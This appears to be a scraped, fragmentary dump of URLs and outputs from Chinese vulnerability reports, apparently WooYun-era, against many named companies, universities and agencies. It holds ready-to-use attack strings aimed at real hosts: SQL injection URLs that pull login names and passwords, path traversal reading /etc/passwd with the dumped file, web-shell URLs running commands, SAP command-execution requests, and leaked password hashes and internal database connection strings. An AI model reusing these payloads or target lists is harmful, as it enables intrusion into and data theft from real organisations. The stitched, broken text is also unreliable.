ftp://125.35.5.232 http://ucenter.b5m.com/tologin.htm http://op.t.b5m.com/ http://adm.b5m.com/ http://mail.b5m.com/ http://zbj.glodon.com/homepage.html https://account.glodon.com/register?return_to=http://zbj.glodon.com http://123.57.91.68/level2.jsp?caid=002 http://123.57.91.68/web-console http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:7060/ http://**.**.**.**:7060/ http://usmelody.lenovo.com:8080 http://**.**.**.**/link?url=Ezpi7c7gO_UfC6EfS7KNlWKzUaLOMBwrizcnFL2CSJfak4iclvXlHfPZvE5jcrLeEH-YJ-IKNA_OAUTJ4bA_5useJaB5QBhmEechKSG-Ws7 https://**.**.**.** http://**.**.**.**:8080/ http://www.51vj.cn/login/forget http://**.**.**.**/cjob/index.do http://jwxt.nwu.edu.cn http://**.**.**.**:7001/index/openRoad.do http://**.**.**.**:7001/test.jsp http://**.**.**.** http://en.med.tsinghua.edu.cn/ http://**.**.**.**/web-sss/org.alle.sss/Index.action http://www.easysources.cn/z_yijiadan.aspx?id=678880 http://pms.ztehome.com.cn http://pms.ztehome.com.cn/data/upload/shell.php http://**.**.**.**/bugs/wooyun-2010-0145666 http://weixin.1yyg.com/member/index.do http://www.yy.hk.cn/网站进行了一次扫描,发现存在wwwroot.rar备份文件。 http://**.**.**.**/home2/login.action http://w.gaopeng.com/.svn/entries http://mtest.gaopeng.com/.svn/entries eg:http://**.**.**.**/info.aspx?id=158 http://yk.ykinns.com:8888/pms/rt_index.html http://**.**.**.**/shownews.asp?ID=851 http://**.**.**.**/shownews.asp http://www.gradms.sdu.edu.cn/login http://**.**.**.**/ReportServer?op=fs_load&cmd=fs_signin http://**.**.**.**/usercenter.do http://**.**.**.**/pic.jsp http://**.**.**.**/ewebeditor/admin/login.jsp http://jenkins.ufenqi.com http://**.**.**.**:8090/ http://**.**.**.**/images.do?filename=../../../../../../../../../../ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:497:496:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin KQZyeTd7Bp9I2T18on6ep4kmR7BOYQtDVZ4dTzJjJXmSjiUw9LZEttIlfhR9n3q00:16665:0:99999:7 root:x:0 bin:x:1:bin,daemon daemon:x:2:bin,daemon sys:x:3:bin,adm adm:x:4:adm,daemon tty:x:5 disk:x:6 lp:x:7:daemon mem:x:8 kmem:x:9 wheel:x:10 mail:x:12:mail,postfix uucp:x:14 man:x:15 games:x:20 gopher:x:30 video:x:39 dip:x:40 ftp:x:50 lock:x:54 audio:x:63 nobody:x:99 users:x:100 dbus:x:81 usbmuxd:x:113 utmp:x:22 utempter:x:35 avahi-autoipd:x:170 desktop_admin_r:x:499 desktop_user_r:x:498 floppy:x:19 vcsa:x:69 rpc:x:32 rtkit:x:497 abrt:x:173 cdrom:x:11 tape:x:33 dialout:x:18 haldaemon:x:68:haldaemon ntp:x:38 apache:x:48 saslauth:x:76 postdrop:x:90 postfix:x:89 avahi:x:70 rpcuser:x:29 nfsnobody:x:65534 pulse:x:496 pulse-access:x:495 fuse:x:494 gdm:x:42 stapusr:x:156 stapsys:x:157 stapdev:x:158 sshd:x:74 tcpdump:x:72 slocate:x:21 http://www.nfu.edu.cn/ http://**.**.**.**/szrmyy/wp-admin/users.php http://xinshi.swu.edu.cn/xinshisuo/index.php https://i.feiniu.com/lostPwd/verifyIdentity?key=865ea2a1e35e91b72c86d44ca2d32461 https://i.feiniu.com/lostPwd/setNewPwd?key=xxxxxx。后面拼接上第二步的key就行了 http://mail.faw.com.cn/ http://**.**.**.**:82/login.TJ http://**.**.**.**/wsbs http://www.maka.im/user/fpwd http://elearning.firstcapital.com.cn:81//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 ftp://**.**.**.**/ http://www.infohold.com.cn/index?st=infobank'%20AND%203*2*1%3d6%20AND%20'000eQ54'%3d'000eQ54 http://**.**.**.**/存在joomla反序列化漏洞 https://security.9666.cn/login.action https://security.9666.cn/login.action http://**.**.**.**/system/Admin_index.asp http://**.**.**.**/CmsEditor/admin_style.asp http://**.**.**.**/usr/PxBs001.asp http://bizhi.sogou.com/bbs/ http://**.**.**.**/news_two.aspx?cateid='%22&newsCateid=41&NewsId=708 http://**.**.**.**/bugs/wooyun-2014-061258来的猥琐思维 http://**.**.**.**/about.aspx?BaseInfoCateID='%22&CateID=12 http://**.**.**.**/dqgg_two.aspx?cateid=25&newsCateid='%22&NewsId=773 http://**.**.**.**/en/news.aspx?CateID=39&NewsCateId='%22 http://**.**.**.**/en/pro.aspx?CateID=20&ProductsCateID='%22 http://**.**.**.**/en/pro_two.aspx?CateId=119&ProductsCateID=119&ProductsID='%22 http://**.**.**.**/zp_two.aspx?CateId=32&PositionId='%22 http://**.**.**.**/tw/cloud/index_event_single.asp?cnlid=16&e=0&pid=053A10829 http://job.fescoadecco.com http://job.fescoadecco.com http://sky.jnu.edu.cn/ftp.php?filename= http://sky.jnu.edu.cn/ftp.php?filename=index.php http://sky.jnu.edu.cn/ftp.php?filename=banner.php http://sky.jnu.edu.cn/ftp.php?filename=link.php http://**.**.**.** http://**.**.**.**/depart_web/dw/dk/admin/article_show.asp?ArticleID=3076 http://wooyun.org/bugs/wooyun-2015-0161947 www.pangthai.com http://**.**.**.**/timsystem http://**.**.**.**/v_news.php?classid=46&id=3530 http://**.**.**.** http://**.**.**.**/myAction.do?method=execute2&id=3617* http://oa.wasu.com.cn:8088/ http://oa.wasu.com.cn:8080/oem.jsp http://zhpt.dfl.com.cn/pipms/client/news_view.jsp?id=294 http://218.16.100.212:8080/gionee/ http://218.16.100.212:8080/gionee/shell.jsp http://**.**.**.**/ http://**.**.**.**///web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**///web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://**.**.**.**/teacherList.php?id=4 http://sso.haier.net http://sso.haier.net/job/index.jsp http://anhuinews.zhuna.net/hotellist.php?cityid=1301*&txtCity=%E5%90%88%E8%82%A5&tm1=2015-12-18&tm2=2015-12-19&seachQ= http://www.vcyber.com/manager/Upload_img"需要自己去构造。。 http://www.vcyber.com//manager/Upload_img http://**.**.**.**/ http://1.202.165.69:7007/clqprt/LoginAction.action http://**.**.**.**/官网哦 http://**.**.**.**/jspspy.jspx encap:Ethernet AE:8B:3B:5A:22 fe3b:5a22/64 Scope:Link MTU:1500 packets:149526305 packets:120117439 txqueuelen:1000 www.airpp.com和www.airpp.net http://sys.airpp.com/pptravel/userManagerAction!login.action https://github.com/stephenxiu/happygo365/blob/7235d01926d22983a6c64faed345b80a3c7d5be1/control/member.php http://**.**.**.**/web/news.do?action=detail&id=201512080544313224* http://www.faw-logistics-oa.com/ http://**.**.**.**/professional.php?para1=9 http://222.195.158.225/oucjw/cas http://**.**.**.**/list/ks3.php?zlm=9 http://**.**.**.**/include/web_content.php?id=9 http://**.**.**.**/list/index.php?zlm=9 http://oa.fawbcc.com.cn/ http://**.**.**.**/?from=wsyc http://jifen.dodopal.com/index.php/rewards-so_showlist-1.html?scontent=* http://**.**.**.** encap:Ethernet E0:81:DC:5F:92 fedc:5f92/64 Scope:Link MTU:1500 packets:60161223 packets:53632790 txqueuelen:1000 http://**.**.**.**:8080/ http://xyb.swu.edu.cn/ http://**.**.**.**/console/login/LoginForm.jsp http://**.**.**.**/seeyon/ http://**.**.**.**/seeyon/management/index.jsp http://**.**.**.**/seeyon/logs/login.log http://**.**.**.**/news_more.asp?lm=&lm2=64 http://**.**.**.**/DataDetail.aspx?type=gzz&id=123 http://www.dodopal.com/Download/,更新至最新版本1.4.0.4 http://**.**.**.**:8080/login.jsp https://github.com/zerocool438/syFront/blob/ebf9dda8ebd95dec0e7fc035b5f4c7ea61ecaaae/project/sbin/smtp.py.bak http://hcm.yonyou.com/cao.aspx http://oa.crpcg.com:8080/seeyon/index.jsp http://oa.crpcg.com:8080//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=xxxuser&P_2_String=xxxpwd http://oa.crpcg.com:8080//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=&RVT=XML&P_1_String=xxxuser&P_2_String=xxxpwd com:8080 http://hz.cofcopack.com:8015/ http://wooyun.org/bugs/wooyun-2010-0132689 http://**.**.**.**/gg_com.jsp?bill=42 http://**.**.**.**:7001/admin/login.php http://**.**.**.**:7001/article_c.php?id=288 http://**.**.**.**/Article/Show.aspx?aid=433&id=7 http://denglish.e21.cn/exam/queryproductlistAction.do?type=info&pid=322 http://oa.sinopharmholding.com http://oa.sinopharmholding.com/seeyon/management/index.jsp http://oa.sinopharmholding.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=zzz&P_2_String=123 http://oa.sinopharmholding.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=tre&RVT=XML&P_1_String=zzz&P_2_String=123 http://**.**.**.**/ http://www.ooopic.com/jianyi.php http://60.28.201.5:2000/idc/ http://60.28.201.5:2000/device/550/ http://60.28.201.5:2000/admin/ http://60.28.201.5:2000/idc/9/北京地区内部机房地点了,北京市海淀区知春路皇冠假日酒店写字楼,有时间路过再拜访下内网。 www.700du.cn http://www.700du.cn http://123.59.13.114:8080/script redis_version:2.4.7 redis_git_sha1:00000000 multiplexing_api:epoll gcc_version:4.4.6 multiplexing_api:epoll gcc_version:4.4.6 process_id:1041 uptime_in_seconds:63210637 uptime_in_days:731 lru_clock:338689 used_cpu_sys:84255.39 used_cpu_user:33401.28 used_cpu_sys_children:0.00 used_cpu_user_children:0.00 used_memory:11248256 used_memory_human:10.73M used_memory_rss:427347968 used_memory_peak:178719528 used_memory_peak_human:170.44M mem_fragmentation_ratio:37.99 mem_allocator:jemalloc-2.2.5 changes_since_last_save:2310025 last_save_time:1448283306 total_connections_received:5106809 total_commands_processed:500165572 expired_keys:1704644 keyspace_hits:42944402 keyspace_misses:19498151 role:master db0:keys=4,expires=0 db1:keys=3385,expires=2 db3:keys=9,expires=0 db5:keys=2,expires=0 db6:keys=10,expires=0 db9:keys=976,expires=976 db10:keys=69,expires=69 db11:keys=3385,expires=1968 db12:keys=8,expires=0 db13:keys=4,expires=4 http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54 http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54 http://img3tw.codoon.com/gps119397e29e21481f8a0582c358a95f92 http://img3tw.codoon.com/gpsa3bed04ac4674c88afe728f161bc6cde http://img3tw.codoon.com/gpscd3efffd8caa4ef090861e8f27a2f59b http://img3tw.codoon.com/gpsda6e429df95145369421e2c2ab26eaab http://eins.xintai.com/eins/page/insure/CustomerInfoWrite.action http://oa.vcyber.com/ http://hr.vcyber.com/ http://erp.vcyber.com/ http://cm.vcyber.com/ http://oa.vcyber.com//oa/admin/application/file_download.jsp?filePath=c:\windows\system.ini http://**.**.**.**/coremail/index.jsp?cus=1 http://**.**.**.**/ http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**:7001/wa/wa/ma3.jsp http://**.**.**.**:8181/auth/login.action http://weixin.bestv.com.cn/ http://weixin.bestv.com.cn/admin/ http://weixin.bestv.com.cn/admin/upload/image/live_carousel/cacbf914-9007-42ed-9fbe-97fffdfea5c9.jsp http://mail.baofoo.com/ http://**.**.**.**/mobilejob/www/show_jianli.php?id=35311&pid=123&type=60 http://**.**.**.**/ http://www.piaohomeinn.com http://www.piaohomeinn.com/hotelList?hotelId=43 http://www.piaohomeinn.com/hotelComments?hotelId=37&commentId=4906#commentSearch http://www.piaohomeinn.com/ajaxResp?type=orderDetail&ordersign=20151218124430oz http://222.74.204.53:80/ http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList.jsp?qry=qwe http://www.cdbl.cn/ViooMa/login.php http://220.160.108.24:8000/ http://club.jj.cn/detail/index/index/cid/2015956 http://app.huawei.com/iRiver-Agent/user.do http://202.85.212.112/MS/index.jsp http://s.wanxue.cn http://s.wanxue.cn/findpw1.do http://s.wanxue.cn/findpw2.do http://**.**.**.**/home.jsp,图中标识链接存在漏洞 http://**.**.**.**/login.action存在命令执行漏洞 https://account.guokr.com/weibo/sign_in/?success=https%3A%2F%2Faccount.guokr.com%2Fsettings%2Fexternal_account%2F https://passport.csdn.net/auth/sinat http://ucenter.51cto.com/api/auth.php?type=sina http://static.qyer.com/upload/mobile/guide.apk http://**.**.**.**:8087 bbf:150:1017%13 b762:1f0f:7c00%10 http://www.ztccct.com/news.php?id=28&page=2 http://www.ztccct.com/content.php?id=28&aid=28 http://www.ztccct.com/page.php?id=39 http://www.zhihu.com/oauth/redirect/bind/sina?next=/oauth/callback http://www.hihuu.com/ http://120.55.138.90/ http://120.55.138.90/file/2015-12-18/e97e3d46eba84a0e9397342e5b1855a0.jsp http://passport.jumei.com/i/extconnect?site_name=sina_weibo&redirect=http%3A%2F%2Fi.jumei.com%2Fi%2Faccount%2Fsync_share http://sime.sufe.edu.cn/.git/config http://**.**.**.**)的本意是搜索时看不到联系方式,想要看联系方式需要充值或者上传其他人的简历。 http://**.**.**.**/custom_customindex.action http://i.youku.com/partner_thirdPartOnlyBind/tlsite_sina_tlclient_ykwebb http://lebook.me/?op=output&cid=27925&format=html&fid=0 http://erp.vcredit.com:82/ http://campus.social-touch.com/ http://campus.social-touch.com/campus.zip http://ybtpadmin.chinacloudsites.cn/ http://**.**.**.**/admin/Uadmin.html http://**.**.**.** http://58.245.254.229/edms/index.php http://wooyun.org/bugs/wooyun-2010-0153296这个漏洞发现存在svn但主目录不存在 http://www.agrite.com.cn/data/mysql_error_trace.inc d90c:117e:fc59:77a6%14 jdbc:oracle:thin:@localhost:1521:orcl http://**.**.**.** http://kofno.cn/ http://kofno.cn/admin.php?r=page/Category/index&class_id=40 http://kofno.cn/admin.php?r=admin/login/ http://helpdesk.sunits.com/ http://helpdesk.sunits.com/hd/login!findPass.do http://**.**.**.**/web/guest/ssologin http://**.**.**.**/lcxweb/index.ext http://payen.eyougame.com/ http://221.7.13.160/npage/login/login.jsp http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:orcl http://cisco.sysu.edu.cn/index.php中山大学思科网络技术学院 http://**.**.**.**/ jdbc:mysql://**.**.**.**/OA http://**.**.**.**:88/swj//FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2F**.**.**.**%3A88%2Fswj%2F%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx http://**.**.**.**/ http://**.**.**.**/Admin/Admin_Index.asp http://**.**.**.**/wooyun.txt http://**.**.**.**/wooyun.txt http://**.**.**.**/ewm.php?code=2871871AX174141/ http://**.**.**.**/网站 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://www.bszc.net/about1.asp?id=67,博盛租车,如图所示: http://oa.bszc.net/user/Logon,租赁平台,如图所示: http://yiapi.xinli001.com/fm/forum-share-page/5875 http://yiapi.xinli001.com/fm/forum-share-page/5896 http://wooyun.org/,将会变成: http://www.zhihu.com/scraper: www.127.0.0.1.xip.io是解析到127.0.0.1的,请求可以发现get成功: https://status.zhihu.com/login http://**.**.**.**/ http://srm.jinjianghotels.com/JJSRM/Portal/ProductInfoList.aspx?RootProductionCatalog=M http://oa.bjgold.com.cn/login/Login.jsp存在Caucho http://oa.bjgold.com.cn/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://oa.bjgold.com.cn/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://oa.bjgold.com.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class http://lexue.lenovo.com.cn/ http://211.144.38.149 http://smile.wanda.cn/app/oauth/editpw http://**.**.**.**/ http://**.**.**.**/admin.php http://**.**.**.**/controller/contro.php?action=login_check&login_username=admin*&login_password=admin&m=0.9825822759885341 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin cimsrvr:x:499:500:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:498:496:RealtimeKit:/proc:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:497:76:"Saslauthd saslauth:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin qpidd:x:496:499:Owner Daemons:/var/lib/qpidd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ricci:x:140:140:ricci user:/var/lib/ricci:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin amandabackup:x:33:6:Amanda user:/var/lib/amanda:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash qemu:x:107:107:qemu user:/:/sbin/nologin memcached:x:495:494:Memcached daemon:/var/run/memcached:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin pulse:x:494:493:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash luci:x:141:141:luci application:/var/lib/luci:/sbin/nologin dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:493:490:Dovecot's user:/usr/libexec/dovecot:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin lytz:x:500:502:lytz:/home/lytz:/bin/bash oracle:x:501:502::/home/oracle:/bin/bash WebBase.war/tm/ jdbc:mysql://localhost:3306/devbase http://**.**.**.**:80/ http://**.**.**.**:778/zx/admin/manager.jsp www.lashou.com http://esmdev.worldunion.com.cn:8080/toolbook/partner/pingtai.jsp http://wusms.worldunion.com.cn:8082/toolbook/tolearnLogin.action存在命令执行漏洞 http://member.multigold.com.cn/login/repassword.html http://www.multigold.com.cn/product/296-0.html#detail-tt,一定都是多金主,用户名都这么霸气:chenxingchen888 http://www.multigold.com.cn/product/1120-0.html#detail-tt,就不能跟上面的比了,名字都叫:nana323 http://**.**.**.**:80/ http://**.**.**.**/ http://mat.tongji.edu.cn http://rtpnr.com http://**.**.**.**/NewsList.aspx?aId=011002 http://**.**.**.**/left-news2.php?no=29940 http://**.**.**.**/index.php?g=Wap&m=Dining&a=ShowDetail&id=1 username:admin passwd:admin http://**.**.**.**/news_content.php?id=180 http://**.**.**.**/login.jsp http://hk5.midea.com/recal.php?detail=1&lang=c&no=1 http://r8i318.rrenren.com.qozea.party/qzone/qqwap/qq_zc http://www.cofcoet.com/en/yewu.asp?lt=13*&Pone=2 http://www.cofcoet.com/en/honor.asp?Ititle=%B9%A4%B3%CC%D7%DC%B3%D0%B0%FC http://www.cofcoet.com/yewu.asp?lt=10*&Pone=6 http://www.cofcoet.com/hjhonor.asp?Ititle=123&IOne=4&Itwo=10* http://www.cofcoet.com/en/hjhonor.asp?Ititle=123&IOne=4&Itwo=10* http://www.cofcoet.com//honor.asp?Ititle=%B9%A4%B3%CC%D7%DC%B3%D0%B0%FC* http://login.passport.9you.com/ http://211.144.223.76/aresmanage/logon/logon1024.jsp http://www.intimecity.com.cn/fh/admin/login.php http://mbaen.rbs.org.cn http://**.**.**.**:1723/yyoa/ http://**.**.**.**:1723/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://www.dfcv.com.cn/ModelPages/MarketActivity/MAVideo.aspx?ColumnCode=-1 http://**.**.**.**/Login.asp http://**.**.**.**/noc/user_login.php http://**.**.**.**/news.php?news_id=696&languages_id=tw http://**.**.**.**/ckfinder/ckfinder.html http://ott.topway.cn/ottindex/topway.html http://116.77.70.115:8080/ http://**.**.**.**/ http://**.**.**.**/index.php/bmd/dosubmit http://**.**.**.**/Admin http://cert.chemao.com.cn/ http://112.126.83.103/gbistm/ http://115.29.142.32 WFRechargeSites.aspx/LoadAreaSites http://**.**.**.** http://**.**.**.** http://182.92.8.131/ http://www.uaes.com/ http://www.uaes.com:7001/1123/ http://www.uaes.com:7001/a/ http://www.uaes.com:7001/cmd/ http://www.uaes.com:7001/dll/ http://www.uaes.com:7001/ggga/ http://www.uaes.com:7001/tian/ http://www.uaes.com:7001/win/ jdbc:oracle:thin:@192.168.51.150:1521/uaesweb http://www.wooyun.org/bugs/wooyun-2015-0162596/trace/d0fc97930194e1e79efed3b342180193, http://mail.huatu.com http://211.151.59.22/manage/ http://211.151.59.22/robots.txt User-agent:Sogou User-agent:Sogou User-agent:Yahoo Disallow:/food/search/menu_* http://i.netqin.com/sitemap.xml http://120.25.213.204:8004/home http://**.**.**.**/gonggao.php?tid=181 www.grhao.com http://www.grhao.com port:161 dork:Huawei port:161 http://**.**.**.**:8888/bdcrm/login.do?method=login http://**.**.**.**:7776/mes/login.action URL:http://**.**.**.**存在兩個SQL注入 http://**.**.**.**/bbs_member.php?id=1 ISO9001:2000质量管理体系认证,荣获“国家星火计划项目”,2011年荣膺“农业产业化国家级重点龙头企业”,并荣获“安徽省质量奖”,2013年成为中国小麦粉加工50强和国家高新技术企业。2014年再次荣膺“农业产业化国家重点龙头企业”,并被国家科技部认定为“国家火炬计划重点高新技术企业”。 http://**.**.**.**:7001/defaultroot/login.jsp http://pop.weibo.com/follow http://pop.weibo.com/follow http://**.**.**.**/sharecourse/course/view/courseList?order=&keyword=%27 http://3kloan.com/login.do?method=jgdy&yid=13&cid=6注入点 http://www.3enong.com/admin/index.php http://**.**.**.**/cn/01news/newsDia.php?cate_id=39&bull_id=12220 www.metinfo.cn http://www.metinfo.cn http://**.**.**.**/newsDetail.php?id=5 http://**.**.**.**/product_powerAjax.php?id=30 http://**.**.**.**/admin/index.php www.wjw.cn http://m.wjw.cn/m.wjw.cn.rar http://**.**.**.**:7001/defaultroot/login.jsp http://econ.sufe.edu.cn:80/ http://e.sinopharm.com http://oa.vatti.com.cn/ http://mail.vatti.com.cn http://**.**.**.**/sc_webcat/ecat/cms_view.php?lang=3&web_id=1 http://**.**.**.**/ http://**.**.**.**// http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://220.179.196.7:7001/defaultroot/login.jsp www.hunantvhr.com http://222.240.176.21/index.php?m=job&c=index&action=detail http://222.240.176.21/uploadfile/pic/2015/1219/20151219114557279.jpg http://222.240.176.21/uploadfile/pic/2015/1219/20151219114557279.jpg/.php http://222.240.176.21/7.php URL:115.236.172.106 http://jyzd.sy.e21.cn/show_news.php?news_id=114 http://**.**.**.**/ http://**.**.**.**/nsinfo.php?id=76 http://pmr.cfldcn.com/,密码为123456 http://www.tuigirl.com/ http://www.tuigirl.com/ www.tuigirl.com http://**.**.**.**//admin_login/upfile.asp?formname=myform&editname=pic2&uppath=images/upfile&filelx=aspx http://**.**.**.**/yjsy/index.php?g=Admin&m=Public&a=login http://**.**.**.**/FCKeditor/editor/filemanager/connectors/test.html# http://kpi.ecnu.edu.cn/web.aspx http://fzgh.ecnu.edu.cn/admin/login.aspx url-1:http://ggkf.ecnu.edu.cn/admin/adminlogin.aspx url-2:http://www.dljx.ecnu.edu.cn/Manage/default.php url-1:http://teacherforum.ecnu.edu.cn/admin/editor/db/ewebeditor.mdb url-2:http://www.cc.ecnu.edu.cn/Data/data.mdb http://www.cc.ecnu.edu.cn/Admin_Login.asp http://www.bstest.ecnu.edu.cn/teacher_kk.asp?id=396 http://www.edp.ecnu.edu.cn/Data/db.mdb http://www.edp.ecnu.edu.cn/onews.asp?id=276 http://www.hfftx.com/ http://221.203.189.62:8000/Index.aspx http://221.203.189.62:8001/sys/wdfk_fkcz_select.aspx http://**.**.**.**/~music/sc/news.php?pid=63 http://**.**.**.**/~music/sc/news.php?pid=63%27 http://**.**.**.**/~music/sc/news.php?pid=63%20and%201=1 http://**.**.**.**/~music/sc/news.php?pid=63%20and%201=2 pwd:000 http://www.4008107107.com/ http://www.4008107107.com/dingcan2list/searchlist?ram=0.10950957192108035&searchKey=e&supplierid=169188 http://202.85.212.101/wx/ http://202.85.212.101/wx/login!login.do http://**.**.**.**/zwdtSjgl/index.htm http://**.**.**.**/zwdtSjgl/Manual/Manual.jsp?depid=013544664 http://42.159.81.132/ http://42.159.81.132/jmxroot/jspshell.jsp?cmd=whoami http://**.**.**.**:50000 http://**.**.**.**:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/..//WEB-INF/config/swms.properties http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/..//WEB-INF/config/client.properties http://**.**.**.**/login.aspx http://**.**.**.** http://bjgold.com.cn/index.action mybatis.org//DTD http://mybatis.org/dtd/mybatis-generator-config_1_0.dtd dbc:mysql://10.10.82.71:3306/mgmt?useUnicode=true&characterEncoding=UTF8 http://www.springframework.org/schema/beans xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:context="http://www.springframework.org/schema/context xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.0.xsd context:annotation-config context:component-scan rmi://127.0.0.1:9988/userService rmi://127.0.0.1:9988/loanService rmi://127.0.0.1:9988/loanInvestorService rmi://127.0.0.1:9988/userInfoService rmi://127.0.0.1:9988/userPicService rmi://127.0.0.1:9988/authenRecordService rmi://127.0.0.1:9988/loanPicService 